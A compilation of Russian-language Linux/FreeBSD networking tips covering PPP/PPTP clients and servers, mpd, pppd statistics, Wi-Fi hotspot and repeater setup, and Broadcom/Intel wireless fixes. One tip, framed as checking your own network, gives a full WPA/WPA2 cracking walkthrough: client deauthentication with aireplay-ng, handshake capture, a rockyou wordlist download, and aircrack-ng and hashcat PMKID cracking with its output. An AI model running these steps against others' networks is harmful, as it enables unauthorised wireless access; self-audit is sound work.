tcp --tcp-flags SYN,RST SYN -m tcpmss --mss 1421:65496 -j TCPMSS --clamp-mss-to-pmtu P.S. В некоторых скриптах используется, при настройке маршрутов, параметр metric 10, это только для отладочных целей, чтобы определенные маршруты выделить из общей массы, никакой иной роли, этот параметр, в данном случае не имеет. P.S.2. У меня конечная таблица маршрутов выглядит так: http://ilyx.ru/openl2tp/openl2tpCEntOS.txt

pptpd и решение проблемы маршрута по умолчанию Автор: Брызгалов Константин [комментарии]

Суть вопроса: Имеем настроенный на linux pptp сервер для подключения внешних клиентов к ресурсам внутренней сети. При установлении соединения с pptp сервером на машине windows клиента поднимается маршрут по умолчанию с более высоким приоритетом, чем маршрут через основное подключение. Вследствие чего перестает работать связь с Интернет, со всеми вытекающими последствиями. Если же в свойствах pptp соединения отключить галочку с пункта "Использовать основной шлюз в удаленной сети", то пропадает связь до ресурсов в удаленной сети. Возможности передать маршруты в рамках соединения клиент-сервер через pptpd нет. Решение: Используем мапирование адресных пространств сетей. Будем транслировать то пространство, которое является локальным для интерфеса windows клиента после установки соединения. Например, имеем адресное пространство удаленной(по отношению к клиенту) сети 192.168.0.0/24, а адрес интерфейса pptpd: # grep localip /etc/pptpd.conf localip 10.50.11.1 Настраиваем трансляцию адресного пространства: # iptables -t nat -A PREROUTING -d 10.50.11.0/24 -j NETMAP --to 192.168.0.0/24 -m comment --comment "For_PPTPD_clients" После чего с клиентской машины есть связь и с интернет, и с ресурсами удаленной сети через адреса 10.50.11.x. Неудобство с применением IP можно обойти через настройку dns с использованием отдельной зоны для клиентов pptpd сервера. Необходимо отметить, что есть еще другой путь решения проблемы - через настройку отдельного dhcp на стороне сервера и использования option ms-classless-static-routes code, option rfc3442-classless-static-routes code. Встретил здесь. Может быть он более правильный, но мне приведенное решение показалось более красивым и простым. PS: Не забудьте разрешить соединения через цепочку FORWARD, если используется политика "Запрещено все, что не разрешено".

Как в mpd5 присвоить определенный номер для ng интерфейса (доп. ссылка 1) Автор: PavelR [комментарии]

Несколько интерфейсов в Multi-link PPP Daemon, например два, можно сделать следующим образом: create bundle static NAME create link static NAME1 TYPE set link action bundle NAME create link static NAME2 TYPE set link action bundle NAME В результате получится два интерфейса, у одного будет жестко ng0, у второго ng1, они появятся в системе сразу после запуска mpd, просто будут в DOWN, пока mpd не подымет линки.

Проверка GSM/UMTS оператора в chat-скрипте (доп. ссылка 1) Автор: Kirill Zabarniuk [комментарии]

В ситуации работы через нескольких операторов для проверки активного GSM/UMTS-оператора, к которому в данный момент подключился модем, в chatscript можно использовать следующую конструкцию: '' ATZ OK-AT-OK "AT+COPS=?" UTEL3G '' OK-AT-OK AT+CGDCONT=1,"IP","unlim.utel.ua" OK-AT-OK "ATDT*99***1#" CONNECT '' '' \d\c Список экзотичных GPRS/3G/UMTS/HSDPA AT-команд можно посмотреть здесь.

Решение проблемы с MPPE, при использовании связки linux, ppp, poptop и IAS (доп. ссылка 1) Автор: mdv [комментарии]

Проблема: pppd[27229]: MPPE required, but keys are not available. Possible plugin problem? Решение: В свойствах "remote access policy", щелкаем "edit profile", на вкладе "encryption" убираем галку No Encryption, Apply, ok. И не верьте никому, что это влияет только на MS RRAS. Причина: Без этой настройки IAS начинает отдавать вот такие радиус-атрибуты: MS-MPPE-Encryption-Policy MS-MPPE-Encryption-Types а с ним, включенным по-умолчанию, не отдает.

Сохранение статистики pppd в MySQL Автор: Андрей "squirL" Товстик [комментарии]

Вот такой код я использую, чтобы вести учет статистики для PPP соединений в MySQL. Этот код помещается в скрипт /etc/ppp/ip-down. Используются переменные окружения, устанавливаемые pppd. #!/bin/sh # echo "INSERT INTO pppdstats VALUES ( `date +%Y%m%d`, `date +\'%T\' -d\"-${CONNECT_TIME} sec\" ` , '$PEERNAME', '$IPREMOTE', '$CONNECT_TIME', '$BYTES_SENT', '$BYTES_RCVD', '$DEVICE', `date +\'%T\'`);" | mysql -uuser -ppassword database Формат таблицы: CREATE TABLE pppdstats ( c_date date, c_start_time time, user varchar(128), ip_addr varchar(15), online_time int(11), send_bytes int(11), recv_bytes int(11), device varchar(15), c_end_time time ); PS: Естественно, что изменив перенаправление можно записывать статистику в обычный текстовый файл.

Настройка клиентского PPTP соединения по msCHAPv2 в Linux (доп. ссылка 1) Автор: onorua [комментарии]

/etc/ppp/chap-secrets # Secrets for authentication using CHAP # client server secret IP addresses vkXXXX * password /etc/ppp/options.pptp lock +chap require-mschap-v2 nobsdcomp nodeflate noaccomp nopcomp defaultroute noipdefault mtu 1000 mru 1000 ipcp-accept-local ipcp-accept-remote noauth /etc/ppp/peers/topnet user vkXXXX defaultroute noauth mru 1000 mtu 1000 Запускаем: sudo pptp 172.16.0.206 call topnet Завершаем сервис: sudo killall pptp

Автоподъем pptp linux-клиента на Fedora Core Linux Автор: Abor Mot [комментарии]

После безуспешного шаманства вокруг pppd с использованием persist, holdof и maxfail решил написать следующий скрипт. Запускается из rc.local #!/usr/bin/perl use strict; use Net::Ping; my $hping=Net::Ping->new("icmp"); my $s=0; sub logger($) { my @ldata=localtime;$ldata[5]+=1900;$ldata[4]+=1; my $j = 0; for ($j = 0;$j < 5; $j++) { if ($ldata[$j] <10) { $ldata[$j] = "0" . $ldata[$j]; } } my $data1="$ldata[3]/$ldata[4]/$ldata[5] $ldata[2]:$ldata[1]:$ldata[0]"; open (MAN_LOG, ">>/var/log/ppp_watcher"); print MAN_LOG "pw: $data1\t$_[0]\n"; close(MAN_LOG) } logger("daemon started."); `echo "kill -15 $$" > /root/ppp_watch.die`; `chmod 0700 /root/ppp_watch.die`; sub ppp_watch { my @presence=split(' ', `ifconfig | grep ppp0`); $presence[0].=''; if ($presence[0] ne 'ppp0') { logger("trying to start daemon."); `route add -net <LOCAL NETWORK> netmask 255.255.255.0 gw <LOCAL GW> 2>/dev/null`; `sleep 2`; `pppd noauth nobsdcomp nodeflate name sspm pty "pptp <GW> --nolaunchpppd" 2>/dev/null`; `sleep 3`; `route add -net <IP> netmask 255.255.255.0 gw <GW> 2>/dev/null`; `sleep 2`; `route del -net 0.0.0.0 netmask 0.0.0.0 gw <LOCAL IP> 2>/dev/null`; `sleep 3`; `route add -net 0.0.0.0 netmask 0.0.0.0 dev ppp0`; $SIG{'ALRM'}='ppp_watch'; logger("delaying for 20 sec..."); alarm(20); } else { my @traff=split(' ', `pppstats | tail -1`); logger("watching, total traffic $traff[0]"); $SIG{'ALRM'}='ppp_watch'; alarm(5); } } ppp_watch; sub ppp_die { $s=1; } $SIG{'TERM'}='ppp_die'; while ($s ne 1) { } logger("daemon stopped."); exit 0; Кроме всего прочего ведет лог состояния и трафика.

Настройка ADSL для Стрима под FreeBSD 4.9/5.3 (доп. ссылка 1) Автор: Dmitry Pupkov [комментарии]

запускать bash# ppp -ddial test Или если мы хотим поднимать соединение при старте, в rc.conf: ppp_enable="YES" ppp_mode="ddial" ppp_profile="test" и никаких tun0! xl0 - ethernet карта куда воткнут модем (у меня Zyxel Omni ADSL LAN EE) Вот как у меня, /etc/ppp/ppp.conf: default: test: set device PPPoE:xl0 set MTU 1492 set MRU 1492 set dial set crtscts off set speed sync accept lqr disable deflate disable pred1 disable vjcomp disable acfcomp disable protocomp set log Phase LCP IPCP CCP Warning Error Alert set ifaddr 10.0.0.1/0 10.0.0.2/0 0.0.0.0 0.0.0.0 add default HISADDR set login set authname ppp0012345@mtu set authkey your_password set server /var/run/ppp/ppp.pid "" 0117

Настройка PPTP-клиента на FreeBSD (альтернативный вариант) Автор: Skylord [комментарии]

Точнее, частично альтернативный. Используем все тот же pptpclient из портов, прописываем роутинг к адресу vpn-сервера (если он в другом сегменте), а потом добавляем в ppp.conf нечто подобное: vpn: set device "!pptp <vpn_server_address> --nolaunchpppd" set dial set login set server /var/run/ppp/loop "" 0177 set timeout 3600 set reconnect 120 0 enable dns set authname <vpn_login> set authkey <vpn_password> nat enable yes enable lqr disable ipv6cp disable mppe set ifaddr 10.0.0.1/0 10.0.0.2/0 255.255.255.0 0.0.0.0 add default HISADDR Это мой конфиг и, естественно, не все из этого (типа, таймаутов и реконнектов) нужно всем. Как видно, в данном случае не pptp вызывает ppp, а наоборот. Главный бонус как раз в том, что можно без геморроя обеспечить on demand'овое соединение (потому и реконнекты с таймаутами у меня стоят) и автоматическое его поднятие, если vpn_server сдох, а потом ожил. Ну и мелкие приятности - типа включения из rc.conf без необходимости написания дополнительных скриптов....

Как в pppd зафиксировать номер PPP интерфейса [комментарии]

Необходимо использовать опцию "unit N", где N - номер ppp интерфейса. Например, для привязки к ppp0: /usr/sbin/pppd /dev/ttyS0 115200 noauth crtscts 192.168.1.245:192.168.1.246 local \ nodetach netmask 255.255.255.252 unit 0

Настройка PPTP-клиента под FreeBSD (доп. ссылка 1) Автор: l0ner [комментарии]

Необходимо установить из портов пакет pptpclient /etc/ppp/ppp.conf vpn: set authname <LOGIN> set authkey <PASSWORD> set timeout 0 set ifaddr 0 0 add default HISADDR Подключение к VBN серверу: /sbin/route add -host <IP_address_of_VPN_server> <gateway> /usr/local/sbin/pptp <IP_address_of_VPN_server> vpn &

Wifi, настройка беспроводного доступа

Решение проблемы с картами Intel после устранения уязвимости в WPA2 в wpa_supplicant (доп. ссылка 1) Автор: sfstudio [комментарии]

После обновления wpa_supplicant с правками, касающимися уязвимости WPA2 CRACK, многие владельцы беспроводных карт Intel (3160, 3168, 7260, 7265, 8000C, 8265) могли обратить внимание на странное поведение адаптера. Проявляется оно как потеря связи на некоторое время с интервалом в половину времени истечения срока жизни GTK. При этом в логах нет абсолютно никакого криминала. Нет также и попыток переподключения, просто останавливается хождение данных, пока роутер или точка доступа не отстрелят такого клиента по idle timeout. Проблема оказалась в том, что intel частично реализует логику SME (даже в случае использования nl80211 подсистемы ядра) на уровне микрокода. И после внесения правок на стороне supplicant’а, обновление группового ключа происходит не всегда корректно. Исправление микрокода Intel представил в обновлении от 3.11.2017, однако большинство дистрибутивов так и не обновили микрокод, хотя обновили supplicant. Отсюда и появилась проблема. Для решения, достаточно загрузить новый микрокод: git clone https://git.kernel.org/pub/scm/linux/kernel/git/iwlwifi/linux-firmware.git После чего содержимое скопировать поверх /lib/firmware и перезагрузиться. Проконтроллировать успех решения проблемы можно заглянув до и после обновления в вывод dmesg и обратив внимание на строку iwlwifi 0000:01:00.0: loaded firmware version XX.YYYYYY.Z op_mode iwlmvm. Кроме всего прочего, неаккуратно бэкпортированные исправления уязвимости wpa_supplicant в Mageia 6 ломают миграцию. Клиент перестаёт выполнять автоматические фоновые сканирования и даже не пытается мигрировать. Решение - сборка последней версии wpa_supplicant из git, куда уже включены все необходимые правки, а также сообщения о проблеме разработчикам своих дистрибутивов.

Настройка локальной Wi-Fi точки доступа в Linux (доп. ссылка 1) [комментарии]

Настройка точки беспроводного доступа на ноутбуке или рабочей станции с Linux. eth0 - сетевой интерфейс, через который осуществляется выход в интернет. wlan0 - интерфейс беспроводной карты (IP 10.0.0.1). Поднимает сетевой интерфейс: ip link set dev wlan0 up ip addr add 10.0.0.1/24 dev wlan0 Настраиваем dnsmasq для отдачи клиентам IP по DHCP и обработки DNS-запросов. Используем подсеть 10.0.0.0/24 tmp-dnsmasq.conf: interface=wlan0 bind-interfaces # Шлюз по умолчанию dhcp-option=3,10.0.0.1 # Список DNS-серверов dhcp-option=6,10.0.0.1 # Диапазон отдаваемых клиентам IP dhcp-range=10.0.0.2,10.0.0.10,12h no-hosts no-resolv log-queries log-facility=/var/log/dnsmasq.log # Рабочий DNS-сервер server=8.8.8.8 server=8.8.4.4 Запускаем dnsmasq: dnsmasq --conf-file=tmp-dnsmasq.conf Настраиваем трансляцию адресов через iptables для обеспечения выхода в интернет: echo '1' > /proc/sys/net/ipv4/ip_forward iptables -A FORWARD -i eth0 -o wlan0 -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE Настраиваем hostapd для работы точки беспроводного доступа: tmp-hotspot.conf ctrl_interface=/var/run/hostapd interface=wlan0 # ESSID, идентификатор беспроводной сети. ssid=TEST driver=nl80211 # hostap, bsd channel=11 # если 0 до автоматический выбор канала hw_mode=g # g - 2.4GHz, a - 5GHz ieee80211d=1 # применение ограничений по частотам для выбранной страны country_code=RU # разрешаем все MAC-адреса, кроме занесённых в чёрный список macaddr_acl=0 # если 1, то разрешение входа только по белому списку (accept_mac_file) deny_mac_file=/etc/hostapd.deny wmm_enabled=0 # 1 - включение QoS auth_algs=1 # 1=wpa, 2=wep, 3=wpa+wep wpa=2 # только WPA2 # Настройки для входа с авторизацией, без них разрешается вход без пароля wpa_key_mgmt=WPA-PSK rsn_pairwise=CCMP wpa_passphrase=пароль_для_полключения Запускаем hostapd: hostapd tmp-hotspot.conf

Создания WiFi-ретрансляторов с поддержкой построения Mesh-сети (доп. ссылка 1) [комментарии]

Для микроконтроллеров ESP 8285 и 8266 со встроенным беспроводным адаптером, которые продаются в китайских интернет-магазинах по цене около 100 руб, подготовлена прошивка с реализацией ретранслятора, позволяющего увеличить зону покрытия существующей беспроводной сети. Ретранслятор реализован в виде точки доступа, прозрачно передающей весь трафик на вышестоящую точку доступа, используя трансляцию адресов (NAT) для организации проброса (не требуется изменение настроек и маршрутизации). Несколько ретрансляторов могут связываться между собой, по цепочке пробрасывая канал связи и образуя Mesh-сеть. Для настройки параметров подключения предоставляется консольный и web-интерфейс (задаётся пароль подключения к внешней беспроводной сети, пароль для подключения к ретранслятору и выбор режима работы). Поддерживаются функции межсетевого экрана, позволяющего ограничить доступ к IP-адресам, подсетям и сетевым портам через простой ACL, а также ограничить пропускную способность подключения клиента. Для IoT-устройств предусмотрена поддержка протокола MQTT. Имеется поддержка режима мониторинга, позволяющего анализировать проходящий через ретранслятор трафик в приложениях, поддерживающих формат pcap (например, wireshark). Для прошивки достаточно подключить плату через последовательный порт или переходник USB2Serial, загрузить готовые сборки прошивки (0x00000.bin и 0x10000.bin) и записать их при помощи специально подготовленной утилиты: esptool.py --port /dev/ttyUSB0 write_flash -fs 4MB -ff 80m -fm dio 0x00000 firmware/0x00000.bin 0x10000 firmware/0x10000.bin Через консоль можно сразу настроить параметры работы ретранслятора: set ssid идентификатор-основной-сети set password пароль-подключения-к-основной-сети set ap_ssid идентификатор-сети-ретранслятора set ap_password пароль-подключения-к-сети-ретранслятора set ap_open 0 set ap_on 1 save

Как увеличить охват квартиры точкой доступа при помощи алюминиевой фольги (доп. ссылка 1) [комментарии]

В случае если беспроводная точка доступа размещена у одной из боковых стен в квартире и в дальних комнатах наблюдается плохой уровень сигнала, решить проблему можно разместив за антеннами точки доступа импровизированный отражатель из обычной пищевой алюминиевой фольги. Отражатель следует ориентировать по направлению комнат с плохим уровнем сигнала. Эффект превосходит все ожидания и в местах, где раньше сеть была недоступна становится можно полноценно работать. Зона покрытия без отражающего экрана: Зона покрытия с отражающим экраном:

Проверка безопасности беспроводной сети WPA/WPA2 при помощи Aircrack-ng и Hashcat (доп. ссылка 1) [комментарии]

Беспроводные сети на базе WPA/WPA2 не подвержены прямым методам атаки, но злоумышленник может получить доступ к системам, на которых установлен недостаточно надёжный пароль. Нижеприведённая инструкция позволяет проверить свои системы на предмет стойкости к атаке по типовому словарю паролей. Предлагается два метода восстановления пароля по перехваченному в трафике хэшу - при помощи Aircrack-ng и Hashcat. Устанавливаем Aircrack-ng: sudo apt-get install aircrack-ng Определяем, поддерживает ли беспроводная карта режим мониторинга (http://aircrack-ng.org/doku.php?id=compatible_cards - выбор поддерживаемых плат), на выходе будет список сетевых интерфейсов для которых имеется подобная поддержка: airmon-ng Переводим беспроводную плату в режим мониторинга: airmon-ng start wlan0 Отслеживаем все проходящие в эфире кадры на предмет идентификаторов беспроводной сети (BSSID) и используемых номеров каналов. airodump-ng mon0 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 9C:5E:8A:C9:AB:C0 -81 19 0 0 6 54e WPA2 CCMP PSK mywifi ... Определив, что наша сеть имеет BSSID 9C:5E:8A:C9:AB:C0 и 6 канал, отслеживаем и сохраняем в файл capture/-01.cap трафик пакетов, связанных с согласованием нового соединения (ждём пока появится надпись "WPA handshake" и прерываем перехват по ctrl-c): airodump-ng -c 6 --bssid 9C:5E:8A:C9:AB:C0 -w capture/ mon0 Для того, чтобы не ждать долго инициируем обрыв соединения у подключенных клиентов (64:BC:0C:49:87:F7 - идентификатор клиента): airodump-ng -c 6 --bssid 9C:5E:8A:C9:AB:C0 mon0 BSSID STATION PWR Rate Lost Frames Probe 9C:5E:8A:C9:AB:C0 64:BC:0C:49:87:F7 -37 1e- 1e 4 6479 ASUS aireplay-ng -0 10 -a 9C:5E:8A:C9:AB:C0 -c 64:BC:0C:49:87:F7 mon0 Загружаем словарь с примерами паролей (размер 134MB, около 14 млн типовых паролей): curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt Запускаем aircrack-ng в режиме подбора хэша пароля по словарю (подбор выполняется только на CPU, без привлечения GPU): aircrack-ng -a2 -b 9C:5E:8A:C9:AB:C0 -w rockyou.txt capture/-01.cap Или используем для этого naive-hashcat (более эффективен при наличии доступа к GPU), предварительно преобразовав cap-дамп в формат hccapx при помощи утилиты cap2hccapx: cap2hccapx.bin capture/-01.cap capture/-01.hccapx HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh Дополнение: Опубликован новый метод атаки, который не требует ожидания подключения к сети нового пользователя и сохранения всей активности, связанной с установкой им соединения. Для получения данных, достаточных для начала подбора пароля, новый метод требует перехвата лишь одного кадра, который можно получить в любое время, отправив запрос аутентификации к точке доступа. Для проведения атаки требуются свежие версии: * hcxdumptool * hcxtools * hashcat Запускаем hcxdumptool, отправляем запрос к точке доступа для получения PMKID и сохраняем результат в файл в формате pcapng: ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status start capturing (stop with ctrl+c) INTERFACE:...............: wlp39s0f3u4u5 FILTERLIST...............: 0 entries MAC CLIENT...............: 89acf0e761f4 (client) MAC ACCESS POINT.........: 4604ba734d4e (start NIC) EAPOL TIMEOUT............: 20000 DEAUTHENTICATIONINTERVALL: 10 beacons GIVE UP DEAUTHENTICATIONS: 20 tries REPLAYCOUNTER............: 62083 .... [13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e [ASSOCIATIONREQUEST, SEQUENCE 4] [13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206] [13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID] В случае если точка доступа поддерживает отправку PMKID будет выведено сообщение "FOUND PMKID". Из-за помех перехват может не получиться с первого раза, поэтому рекомендуется запускать hcxdumptool в течение приблизительно 10 минут. Запускаем утилиту hcxpcaptool для преобразования перехваченного дампа из формата pcapng в формат для разбора в hashcat. ./hcxpcaptool -z test.16800 test.pcapng start reading from test.pcapng summary: -------- file name....................: test.pcapng file type....................: pcapng 1.0 file hardware information....: x86_64 file os information..........: Linux 4.17.11-arch1 file application information.: hcxdumptool 4.2.0 network type.................: DLT_IEEE802_11_RADIO (127) endianess....................: little endian read errors..................: flawless packets inside...............: 66 skipped packets..............: 0 packets with FCS.............: 0 beacons (with ESSID inside)..: 17 probe requests...............: 1 probe responses..............: 11 association requests.........: 5 association responses........: 5 authentications (OPEN SYSTEM): 13 authentications (BROADCOM)...: 1 EAPOL packets................: 14 EAPOL PMKIDs.................: 1 1 PMKID(s) written to test.16800 Содержимое записанного файла включает строки вида "2582a81d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465af3a", которые содержат шестнадцатеричные значения PMKID, MAC AP,MAC Station и ESSID. Дополнительно при запуске hcxpcaptool можно использовать опции "-E", "-I" и '-U" для анализа наличия паролей, идентификаторов и имён пользователей в беспроводном трафике: ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng Запускаем hashcat для подбора пароля (применяется режим 16800): ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!' hashcat (v4.2.0) starting... OpenCL Platform #1: NVIDIA Corporation ====================================== * Device #1: GeForce GTX 1080, 2028/8112 MB allocatable, 20MCU * Device #2: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU * Device #3: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU * Device #4: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Applicable optimizers: * Zero-Byte * Single-Hash * Single-Salt * Brute-Force * Slow-Hash-SIMD-LOOP Minimum password length supported by kernel: 8 Maximum password length supported by kernel: 63 Watchdog: Temperature abort trigger set to 90c 2582573161c61*4604d4e*89acf0e761f4*ed4824639f3a:hashcat! Session..........: hashcat Status...........: Cracked Hash.Type........: WPA-PMKID-PBKDF2 Hash.Target......: 2582a8281d0e61c61*4604ba734d4e*89acf...a39f3a Time.Started.....: Sun Aug 12 12:51:38 2018 (41 secs) Time.Estimated...: Sun Aug 12 12:52:19 2018 (0 secs) Guess.Mask.......: ?l?l?l?l?l?lt! [8] Guess.Queue......: 1/1 (100.00%) Speed.Dev.#1.....: 408.9 kH/s (103.86ms) @ Accel:64 Loops:128 Thr:1024 Vec:1 Speed.Dev.#2.....: 408.6 kH/s (104.90ms) @ Accel:64 Loops:128 Thr:1024 Vec:1 Speed.Dev.#3.....: 412.9 kH/s (102.50ms) @ Accel:64 Loops:128 Thr:1024 Vec:1 Speed.Dev.#4.....: 410.9 kH/s (104.66ms) @ Accel:64 Loops:128 Thr:1024 Vec:1 Speed.Dev.#*.....: 1641.3 kH/s Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.........: 66846720/308915776 (21.64%) Rejected.........: 0/66846720 (0.00%) Restore.Point....: 0/11881376 (0.00%) Candidates.#1....: hariert! -> hhzkzet! Candidates.#2....: hdtivst! -> hzxkbnt! Candidates.#3....: gnxpwet! -> gwqivst! Candidates.#4....: gxhcddt! -> grjmrut! HWMon.Dev.#1.....: Temp: 81c Fan: 54% Util: 75% Core:1771MHz Mem:4513MHz Bus:1 HWMon.Dev.#2.....: Temp: 81c Fan: 54% Util:100% Core:1607MHz Mem:4513MHz Bus:1 HWMon.Dev.#3.....: Temp: 81c Fan: 54% Util: 94% Core:1683MHz Mem:4513MHz Bus:1 HWMon.Dev.#4.....: Temp: 81c Fan: 54% Util: 93% Core:1620MHz Mem:4513MHz Bus:1

Решение проблем с работой поставляемых в ноутбуках Samsung WiFi-адаптеров Broadcom BCM4313 в Ubuntu [комментарии]

Многие модели ноутбуков Samsung укомплектованы WiFi-адаптерами на базе чипа Broadcom BCM4313. При этом в процессе работы, при использовании штатных открытых драйверов, идущих в базовой поставке Ubuntu, от версии к версии наблюдаются разнообразные проблемы. Например, подсоединиться к Wifi-сетям удаётся с десятой попытки или сеть периодически зависает - линк поднят, но данные через сетевой интерфейс не передаются до пересоединения с беспроводной сетью. Решение проблемы простое, поставить проприетаный вариант прошивки: sudo apt-get remove --purge bcmwl-kernel-source sudo apt-get install linux-firmware-nonfree sudo apt-get install firmware-b43-installer после чего нужно перезагрузить систему для загрузки новой прошивки.

Отключение STP в точках доступа ASUS WL520gc (доп. ссылка 1) Автор: vvm7ua [комментарии]

Не так давно столкнулся с ситуацией, когда есть в сети несколько точек доступа ASUS WL520gc, который "гоняют" по сети лишний трафик в виде STP. Решение было найдено следующее: необходимо зайти на страницу роутера по адресу http://ip/Main_AdmStatus_Content.asp ввести в после System Command: значение nvram set lan_stp=0 нажать кнопку Refresh затем ввести nvram commit и снова нажать кнопку Refresh после этого необходимо будет ввести reboot и опять нажать Refresh Роутер уйдет на перезагрузку и STP таким образом более не будет тревожить другие сетевые устройства в сети.

Настройка беспроводного соединения в Debian GNU/Linux Автор: screenn [комментарии]

Действия по настройке Wi-Fi проводились в стабильном дистрибутиве Debian GNU/Linux 6.0.4 Ранее длительное время я работал с модулем NDISwrapper, который удавалось запускать с поддержкой WEP шифрования. После того как WEP шифрование было принято считать небезопасным, под рукой оказалось решение под названием wpasupplicant позволяющее работать с WPA и WPA2 методами шифрования в беспроводных сетях, которое было взято на вооружение в совокупности с драйверами b43 - в них на этот момент уже поддерживались Broadcom устройства. Все прекрасно работало пока не было принято решение вернуться к стабильному дистрибутиву после многолетних экспериментов работы в среде sid, что повлекло за собой переустановку и необходимость перенастройки системы и написания данной инструкции. Для начала необходимо убедиться в присутствии беспроводного адаптера - команда lspci lspci В моем случае обнаружились ethernet и wifi сетевые карты: 02:00.0 Ethernet controller: Broadcom Corporation NetLink BCM5787M Gigabit Ethernet PCI Express (rev 02) 04:00.0 Network controller: Broadcom Corporation BCM4312 802.11b/g LP-PHY (rev 01) Немного погуглив удалось найти информацию на английском языке http://wiki.debian.org/bcm43xx - там есть список с описанием модулей, в каких ядрах и версиях системы они работают а где нет. А также инструкция по установке. Оказалось на сегодняшний день есть несколько разновидностей драйверов для Linux: b43, b43legacy, brcm80211, rndis_wlan, wl, наряду с которыми все так же остается возможность запускать WINDOWS-драйвер сетевых карт при помощи NDISwrapper модуля. Далее просто приведу шаги выполненные по вышеприведенной инструкции: 1. Необходимо добавить contrib non-free части в строку с источником установки, отредактировав файл /etc/apt/sources.list #строка с источником установки пакетов системы deb http://ftp.us.debian.org/debian squeeze main contrib non-free 2. После добавления новых источников установки необходимо обновить список доступных пакетов и установить утилиту wireless-tools aptitude update && aptitude install wireless-tools 3. Далее следует установка самих драйверов, в зависимости от типа вашей сетевой карты необходимо выбрать правильный драйвер, в моем случае это устройство BCM4312 802.11b/g LP-PHY - как показала команда lspci, поэтому я выполняю команду устанавливающую firmware-b43-lpphy-installer. Для владельцев других сетевых карт соответственно: 802.11b/g BCM4306 revision 3, BCM4311, BCM4318 - устанавливаем firmware-b43-installer; 802.11b BCM4301, 802.11b/g BCM4306 revision 2 chipset - устанавливаем firmware-b43legacy-installer; aptitude install firmware-b43-lpphy-installer aptitude install firmware-b43-lpphy-installer 4. Проверим что модуль загрузился: # lsmod | grep b43 b43 132415 0 rng_core 2178 1 b43 mac80211 122874 1 b43 cfg80211 86965 2 b43,mac80211 ssb 33578 1 b43 led_class 1757 3 b43,acer_wmi,sdhci mmc_core 38277 3 b43,sdhci,ssb pcmcia 16194 2 b43,ssb pcmcia_core 20414 5 b43,yenta_socket,rsrc_nonstatic,ssb,pcmcia Модуль b43 - загружен успешно, если у вас он окажется не загружен, можно попробовать загрузить его командой modprobe b43, в случае если он загружен но не отрабатывает корректно - можно попробовать сначала его выгрузить командой modprobe -r b43 после чего загрузить заново. 5. Драйверы установлены и загружены теперь можно проверить наличие wifi карты в списке сетевых устройств утилитой iwconfig: # iwconfig lo no wireless extensions. eth0 no wireless extensions. irda0 no wireless extensions. wlan0 IEEE 802.11bg ESSID:off/any Mode:Managed Frequency:2.457 GHz Access Point: Not Associated Tx-Power=27 dBm Retry long limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off pan0 no wireless extensions. Видно что в списке сетевых адаптеров присутствует wlan0 - устройство распознанное как IEEE 802.11bg, это и есть ни что иное как наш wifi адаптер. 6. Далее необходимо сконфигурировать сетевые настройки в системе для нашего wifi адаптера. Для этого редактируем файл настройки сетевых подключений /etc/network/interfaces добавляя опции новой wifi сетевой карты: #my Wi-fi connection auto wlan0 iface wlan0 inet dhcp 7. Стартуем новый сетевой интерфейс - ifup wlan0 # ifup wlan0 Internet Systems Consortium DHCP Client 4.1.1-P1 Listening on LPF/wlan0/00:00:00:00:00:00 Sending on LPF/wlan0/00:00:00:00:00:00 Sending on Socket/fallback DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 7 DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 10 DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 7 DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 12 DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 8 DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 15 DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 2 No DHCPOFFERS received. No working leases in persistent database - sleeping. После выполнения данной команды система попытается получить адрес по dhcp, в результате чего мы увидим что адрес ей получить не удалось так как не указана точка доступа, но при этом wlan0 интерфейс появится в списке поднятых интерфейсов отображаемых при просмотре ifconfig Затем уже можно будет выполнять сканирование пространства на наличие точек доступа. Попытки просканировать пространство с неподнятым интерфейсом выдадут сообщение:"wlan0 Interface doesn't support scanning : Network is down" 8. Проверить поднялся ли wlan0 интерфейс можно командой ifconfig #ifconfig wlan0 Link encap:Ethernet HWaddr 00:00:00:00:00:00 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:408 errors:0 dropped:0 overruns:0 frame:0 TX packets:62 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:26662 (26.0 KiB) TX bytes:6305 (6.1 KiB) 9. Если интерфейс поднялся мы можем просканировать пространство на наличие WIFI точек доступа командой - iwlist scanning # iwlist scanning lo Interface doesn't support scanning. eth0 Interface doesn't support scanning. irda0 Interface doesn't support scanning. pan0 Interface doesn't support scanning. wlan0 Scan completed : Cell 01 - Address: 00:00:00:00:00:00 Channel:13 Frequency:2.457 GHz (Channel 13) Quality=70/70 Signal level=-3 dBm Encryption key:on ESSID:"myhome" Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 6 Mb/s; 9 Mb/s 11 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s 48 Mb/s; 54 Mb/s Mode:Master Extra:tsf=0000003f190b259c 